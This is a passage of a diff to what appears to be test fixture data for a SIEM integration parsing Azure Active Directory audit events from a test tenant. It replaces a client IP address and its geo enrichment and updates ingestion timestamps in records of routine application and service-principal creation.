"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -12827,25 +11729,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -12859,7 +11743,7 @@
 "ObjectId": "Not Available",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -12985,7 +11869,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -12997,12 +11881,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036438400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\"
:\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125197800Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 
1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13028,25 +11912,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13060,7 +11926,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -13186,7 +12052,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -13198,12 +12064,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036442800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\"
:\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125202500Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"t